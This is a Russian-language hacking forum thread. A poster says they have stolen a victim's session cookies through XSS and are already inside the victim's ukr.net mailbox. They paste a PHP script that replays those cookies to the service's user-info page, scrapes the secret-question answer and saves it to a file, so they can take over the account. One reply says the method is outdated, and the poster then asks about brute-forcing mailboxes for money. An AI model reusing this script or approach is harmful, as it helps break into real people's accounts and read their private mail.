через XSS имею куки. захожу на ящик жертвы нормально. не нашел, за что бы зацепиться поменять пароль, не зная текущего... в востановлении пароля используется секретный вопрос. погуглив, нашел старенький скрипт, позволяющий имея куки выдрать ответ на секретный вопрос, правда работу его немного не понял ) вот он: PHP: <? $query=$_SERVER["QUERY_STRING"]; $query=urldecode($query); $header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn"; $header.="Referer: http://e.ukr.netrn"; $header.="Cookie: ".$query."rn"; $header.="Host: e.ukr.netrnrn"; $fp=fsockopen("e.ukr.net", 80); fwrite($fp, $header); $dt=""; while (!feof($fp)) $dt.=fread($fp, 1024); // выдираем из полученной страницы ответ на секретный вопрос $answ1=strpos($dt,'Password_Answer')+24; $answ2=strpos($dt,'" size="40">'); $length_answ=$answ2-$answ1; $full_answer=substr($dt,$answ1,$length_answ); // сохраняем полученный ответ на вопрос в файл: answer.html $fp1=Fopen("answer.html","a"); fwrite($fp1,"$full_answer"); fclose($fp1); fclose($fp); ?> грамотные люди, подскажите есть ли рабочий скрипт такого плана или идеи по смене пароля.. удачи!
нет. Возможно когда-то давно ответ на секретный вопрос можно было узнать просто попав в ящик, или сняв куки. Данная строчка обращение к данной странице, при помощи авторизации через куки.
lmns не знал, что секретный вопрос лежал открыто раньше ) так что, значит не судьба поиметь пароль? а народ, что за бабки ящики ломает, брутят что ли только?